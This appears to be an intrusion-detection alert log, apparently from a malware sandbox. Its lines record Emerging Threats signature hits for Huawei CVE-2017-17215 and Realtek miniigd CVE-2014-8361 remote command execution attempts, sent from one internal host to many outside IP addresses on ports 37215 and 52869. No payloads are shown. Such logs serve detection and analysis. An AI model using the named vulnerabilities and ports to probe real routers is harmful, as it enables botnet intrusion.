                                      07/20/24-23:01:24.910426TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5009637215192.168.2.23132.105.175.229
                                      07/20/24-23:01:47.179280TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3974252869192.168.2.2339.76.169.126
                                      07/20/24-23:01:13.321371TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614911652869192.168.2.2378.146.199.168
                                      07/20/24-23:01:44.565131TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5495252869192.168.2.2335.100.148.20
                                      07/20/24-23:02:05.374045TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5460252869192.168.2.23209.233.186.203
                                      07/20/24-23:01:41.263056TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3823652869192.168.2.23114.149.101.121
                                      07/20/24-23:01:47.455724TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4180852869192.168.2.23185.97.134.51
                                      07/20/24-23:01:02.456435TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3592452869192.168.2.2347.10.251.72
                                      07/20/24-23:01:07.054782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5854637215192.168.2.23197.21.203.147
                                      07/20/24-23:01:02.064358TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4142837215192.168.2.2341.158.142.0
                                      07/20/24-23:01:45.134490TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613473252869192.168.2.2337.158.125.18
                                      07/20/24-23:01:44.349550TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24107852869192.168.2.23202.203.199.212
                                      07/20/24-23:01:51.063023TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4045452869192.168.2.2318.166.243.209
                                      07/20/24-23:01:04.114673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5773637215192.168.2.23197.52.94.108
                                      07/20/24-23:01:24.596580TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3811652869192.168.2.2361.127.88.100
                                      07/20/24-23:01:42.966322TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4845052869192.168.2.2337.192.4.35
                                      07/20/24-23:01:41.205247TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3904252869192.168.2.23124.109.117.107
                                      07/20/24-23:01:42.943881TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4994052869192.168.2.23177.9.244.61
                                      07/20/24-23:01:11.636425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6054037215192.168.2.2341.44.134.248
                                      07/20/24-23:01:32.032492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3561237215192.168.2.23155.165.117.153
                                      07/20/24-23:01:53.607815TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5993652869192.168.2.23159.51.221.45
                                      07/20/24-23:01:51.016560TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24411252869192.168.2.23149.8.44.5
                                      07/20/24-23:01:13.300689TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4011252869192.168.2.2394.32.208.135
                                      07/20/24-23:01:04.115220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5198837215192.168.2.2396.4.116.14
                                      07/20/24-23:01:08.556166TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23678052869192.168.2.2327.254.228.216
                                      07/20/24-23:01:44.944836TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615154852869192.168.2.23151.41.38.224
                                      07/20/24-23:01:34.062277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5342837215192.168.2.23197.222.250.183
                                      07/20/24-23:01:48.496839TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5233052869192.168.2.23129.68.201.164
                                      07/20/24-23:01:14.113390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3402437215192.168.2.23197.105.252.117
                                      07/20/24-23:01:43.039504TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25280452869192.168.2.23174.16.2.141
                                      07/20/24-23:01:52.914137TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3497052869192.168.2.2337.158.125.18
                                      07/20/24-23:01:44.624686TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5711852869192.168.2.23155.161.7.211
                                      07/20/24-23:01:00.651026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5773637215192.168.2.2341.242.166.123
                                      07/20/24-23:01:59.905375TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4426052869192.168.2.23112.175.144.226
                                      07/20/24-23:01:50.246033TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615697852869192.168.2.23130.119.229.116
                                      07/20/24-23:01:41.381812TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5304252869192.168.2.23105.155.204.151
                                      07/20/24-23:01:52.144379TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5662452869192.168.2.2392.182.23.52
                                      07/20/24-23:01:04.031511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4510037215192.168.2.2341.115.102.16
                                      07/20/24-23:01:41.392527TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614873052869192.168.2.23202.140.13.200
                                      07/20/24-23:01:01.299586TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4714252869192.168.2.23213.46.179.130
                                      07/20/24-23:01:08.613165TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5247052869192.168.2.2374.116.148.181
                                      07/20/24-23:01:21.944679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4860837215192.168.2.2341.63.171.55
                                      07/20/24-23:01:31.976649TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5947637215192.168.2.23197.165.97.37
                                      07/20/24-23:01:02.333866TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613356452869192.168.2.2354.235.197.43
                                      07/20/24-23:01:45.544315TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4676452869192.168.2.238.220.8.58
                                      07/20/24-23:01:56.127051TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6047052869192.168.2.23205.96.176.194
                                      07/20/24-23:01:59.043868TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24160852869192.168.2.2318.255.33.143
                                      07/20/24-23:01:49.490945TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615924252869192.168.2.2346.134.86.41
                                      07/20/24-23:01:42.454682TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615964452869192.168.2.23161.210.183.51
                                      07/20/24-23:01:58.216922TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24996652869192.168.2.23187.61.181.140
                                      07/20/24-23:01:44.921789TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5239652869192.168.2.2390.64.10.170
                                      07/20/24-23:01:41.867104TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23728852869192.168.2.23108.137.226.148
                                      07/20/24-23:01:43.791502TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25581252869192.168.2.23197.159.127.103
                                      07/20/24-23:01:46.961079TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5010252869192.168.2.2380.12.29.225
                                      07/20/24-23:01:41.496780TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5518252869192.168.2.23171.82.217.243
                                      07/20/24-23:01:41.481591TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613352852869192.168.2.2394.18.60.159
                                      07/20/24-23:01:52.914137TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25363652869192.168.2.23155.185.16.155
                                      07/20/24-23:01:54.567167TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25562652869192.168.2.23222.178.130.155
                                      07/20/24-23:00:59.192052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5004037215192.168.2.2341.124.29.47
                                      07/20/24-23:02:02.085571TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24784052869192.168.2.2342.127.253.166
                                      07/20/24-23:02:00.552327TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615683852869192.168.2.2387.120.192.128
                                      07/20/24-23:00:59.161892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4150637215192.168.2.23157.139.2.14
                                      07/20/24-23:01:53.625100TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23750452869192.168.2.23179.230.186.151
                                      07/20/24-23:01:40.334933TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3510037215192.168.2.23197.45.233.176
                                      07/20/24-23:01:44.277250TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24386452869192.168.2.23123.147.61.106
                                      07/20/24-23:01:04.118165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3547837215192.168.2.2346.114.222.105
                                      07/20/24-23:01:03.090902TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613769652869192.168.2.23150.171.160.226
                                      07/20/24-23:01:43.671215TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4219452869192.168.2.23187.139.238.2
                                      07/20/24-23:01:54.489563TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4352052869192.168.2.23158.218.4.185
                                      07/20/24-23:01:02.057728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3402037215192.168.2.2341.99.98.84
                                      07/20/24-23:01:42.656963TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4082452869192.168.2.23129.151.175.195
                                      07/20/24-23:01:58.143690TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25218852869192.168.2.23149.240.88.161
                                      07/20/24-23:02:06.477726TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613542852869192.168.2.23128.140.142.60
                                      07/20/24-23:01:45.118041TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5114052869192.168.2.23221.199.165.178
                                      07/20/24-23:01:03.083161TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615247852869192.168.2.23132.33.116.164
                                      07/20/24-23:01:06.988055TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4116837215192.168.2.2341.212.175.247
                                      07/20/24-23:01:42.196522TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25715652869192.168.2.239.196.233.159
                                      07/20/24-23:01:01.772213TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615797852869192.168.2.23184.112.202.180
                                      07/20/24-23:01:47.354421TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6056652869192.168.2.2346.134.86.41
                                      07/20/24-23:01:20.132103TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4867037215192.168.2.23157.241.240.40
                                      07/20/24-23:01:32.032492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5362437215192.168.2.23157.196.127.144
                                      07/20/24-23:01:46.891763TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24343652869192.168.2.2343.71.121.153
                                      07/20/24-23:01:02.370068TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4353452869192.168.2.23168.54.72.251
                                      07/20/24-23:01:34.044223TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3356637215192.168.2.23157.191.169.80
                                      07/20/24-23:01:24.915904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4721437215192.168.2.23157.8.72.36
                                      07/20/24-23:01:49.120513TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3643252869192.168.2.2343.180.222.83
                                      07/20/24-23:01:04.058922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4567837215192.168.2.23157.157.232.183
                                      07/20/24-23:01:12.813695TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24206452869192.168.2.2351.49.44.101
                                      07/20/24-23:01:51.517722TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613778252869192.168.2.23189.27.117.219
                                      07/20/24-23:01:40.321965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5787437215192.168.2.23197.34.80.193
                                      07/20/24-23:01:42.466150TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615891652869192.168.2.2336.185.15.35
                                      07/20/24-23:01:42.985200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4874052869192.168.2.2361.169.227.46
                                      07/20/24-23:01:08.691384TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4639452869192.168.2.23153.94.71.254
                                      07/20/24-23:01:42.632123TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613755452869192.168.2.23168.18.159.220
                                      07/20/24-23:01:45.063335TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24525652869192.168.2.2393.44.110.204
                                      07/20/24-23:01:25.935242TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4543652869192.168.2.2393.61.135.109
                                      07/20/24-23:01:11.660067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5235637215192.168.2.23157.108.55.229
                                      07/20/24-23:01:31.312736TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4918652869192.168.2.23166.142.205.252
                                      07/20/24-23:01:49.631749TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5419452869192.168.2.2373.161.205.249
                                      07/20/24-23:01:55.262010TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613812252869192.168.2.23190.187.129.147
                                      07/20/24-23:01:43.843278TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25042452869192.168.2.23152.188.24.161
                                      07/20/24-23:00:59.203960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5965237215192.168.2.2341.240.87.211
                                      07/20/24-23:01:48.070705TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3460852869192.168.2.2366.14.7.167
                                      07/20/24-23:01:55.802130TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5774252869192.168.2.2332.64.201.235
                                      07/20/24-23:01:02.048113TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5786037215192.168.2.23197.244.76.85
                                      07/20/24-23:01:40.307219TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3438637215192.168.2.2341.199.42.244
                                      07/20/24-23:01:45.030115TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614149052869192.168.2.23158.249.141.193
                                      07/20/24-23:01:49.741351TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4286652869192.168.2.23155.107.33.68
                                      07/20/24-23:01:51.879276TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6016252869192.168.2.2313.31.40.78
                                      07/20/24-23:01:40.321300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6080237215192.168.2.23197.55.198.212
                                      07/20/24-23:02:20.036130TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614337052869192.168.2.23103.119.134.177
                                      07/20/24-23:00:59.191389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5607237215192.168.2.23169.239.10.111
                                      07/20/24-23:01:52.053251TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23323652869192.168.2.2365.82.234.209
                                      07/20/24-23:01:43.415157TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3356252869192.168.2.23134.101.23.241
                                      07/20/24-23:01:07.018425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5007037215192.168.2.2370.120.208.1
                                      07/20/24-23:01:58.602024TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5242252869192.168.2.23216.216.135.51
                                      07/20/24-23:01:46.525128TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614732252869192.168.2.23121.163.119.125
                                      07/20/24-23:01:43.197088TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25598652869192.168.2.232.108.114.50
                                      07/20/24-23:01:25.796791TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5728652869192.168.2.23103.96.50.123
                                      07/20/24-23:01:46.444817TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615429452869192.168.2.23207.198.69.39
                                      07/20/24-23:01:47.940882TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615098052869192.168.2.2359.111.61.71
                                      07/20/24-23:01:49.011895TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615001652869192.168.2.23118.229.228.64
                                      07/20/24-23:02:09.237639TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25675452869192.168.2.23150.220.0.209
                                      07/20/24-23:01:53.427882TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23734252869192.168.2.23190.13.238.183
                                      07/20/24-23:02:02.570955TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5147852869192.168.2.23131.116.5.106
                                      07/20/24-23:01:40.291616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3946637215192.168.2.23197.236.253.31
                                      07/20/24-23:01:48.931855TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24601052869192.168.2.23213.131.100.211
                                      07/20/24-23:01:34.053061TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3808437215192.168.2.2384.170.188.89
                                      07/20/24-23:01:00.636533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3293637215192.168.2.23137.33.55.254
                                      07/20/24-23:01:02.789203TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614823252869192.168.2.2398.176.193.82
                                      07/20/24-23:01:52.161566TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614792452869192.168.2.2320.28.196.248
                                      07/20/24-23:01:26.734319TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615138652869192.168.2.23143.38.216.11
                                      07/20/24-23:01:55.594888TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4111652869192.168.2.2359.99.39.216
                                      07/20/24-23:01:51.021834TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5397852869192.168.2.23116.238.28.166
                                      07/20/24-23:01:46.453936TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5781452869192.168.2.23193.184.52.222
                                      07/20/24-23:01:31.314906TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5778652869192.168.2.235.207.112.150
                                      07/20/24-23:00:59.201622TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3639637215192.168.2.2381.147.177.5
                                      07/20/24-23:01:41.747994TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615295452869192.168.2.23135.205.140.164
                                      07/20/24-23:01:47.915367TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614250652869192.168.2.23110.244.30.5
                                      07/20/24-23:01:49.553792TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3507452869192.168.2.2368.106.199.227
                                      07/20/24-23:01:32.034562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4810637215192.168.2.23157.115.47.163
                                      07/20/24-23:01:00.634165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3435837215192.168.2.23197.67.20.2
                                      07/20/24-23:01:02.113055TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4046637215192.168.2.23197.139.203.167
                                      07/20/24-23:01:42.780168TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3365252869192.168.2.23213.68.164.174
                                      07/20/24-23:01:27.649912TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5006237215192.168.2.23197.206.255.142
                                      07/20/24-23:01:46.891763TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614881452869192.168.2.235.252.81.48
                                      07/20/24-23:00:57.220899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4873437215192.168.2.2341.174.115.244
                                      07/20/24-23:01:34.044717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4616237215192.168.2.23157.172.112.67
                                      07/20/24-23:00:59.196993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4599637215192.168.2.23157.115.232.41
                                      07/20/24-23:01:57.978712TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613308852869192.168.2.2372.182.239.64
                                      07/20/24-23:01:11.822392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5838637215192.168.2.23116.78.34.252
                                      07/20/24-23:01:42.962388TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615957652869192.168.2.238.18.22.34
                                      07/20/24-23:01:49.946258TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5403652869192.168.2.2345.99.89.219
                                      07/20/24-23:01:42.662837TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25592252869192.168.2.2387.76.92.180
                                      07/20/24-23:01:08.571946TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24682652869192.168.2.2382.63.31.170
                                      07/20/24-23:01:08.611391TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24815052869192.168.2.23130.136.141.197
                                      07/20/24-23:01:02.259207TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614935252869192.168.2.23193.7.32.204
                                      07/20/24-23:01:42.486621TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23315652869192.168.2.2352.64.207.91
                                      07/20/24-23:01:01.479730TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4672852869192.168.2.2313.18.63.141
                                      07/20/24-23:01:57.111220TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4906252869192.168.2.235.252.81.48
                                      07/20/24-23:01:52.609595TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613330652869192.168.2.23132.173.198.51
                                      07/20/24-23:02:00.328412TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4010052869192.168.2.23164.237.7.212
                                      07/20/24-23:01:20.181938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4651037215192.168.2.23157.61.177.250
                                      07/20/24-23:01:54.515976TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616095052869192.168.2.2344.193.90.160
                                      07/20/24-23:02:34.610209TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25355052869192.168.2.23129.68.201.164
                                      07/20/24-23:01:31.331820TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3673052869192.168.2.23212.202.137.63
                                      07/20/24-23:01:31.976649TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4598237215192.168.2.2341.175.115.88
                                      07/20/24-23:01:44.209629TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25576852869192.168.2.23117.174.229.249
                                      07/20/24-23:00:59.185032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3630437215192.168.2.2341.41.122.187
                                      07/20/24-23:01:31.982478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4677237215192.168.2.2319.181.181.97
                                      07/20/24-23:01:46.580798TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614413252869192.168.2.23191.8.175.218
                                      07/20/24-23:01:46.403723TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25357252869192.168.2.23153.234.108.85
                                      07/20/24-23:00:57.222254TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3414237215192.168.2.23197.5.25.5
                                      07/20/24-23:01:05.033018TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614527652869192.168.2.23130.190.148.15
                                      07/20/24-23:01:00.633635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5356437215192.168.2.23157.72.248.222
                                      07/20/24-23:01:45.925226TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615455652869192.168.2.2353.50.131.136
                                      07/20/24-23:01:20.098209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4938237215192.168.2.23157.234.70.152
                                      07/20/24-23:01:44.766696TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5757852869192.168.2.23135.215.110.183
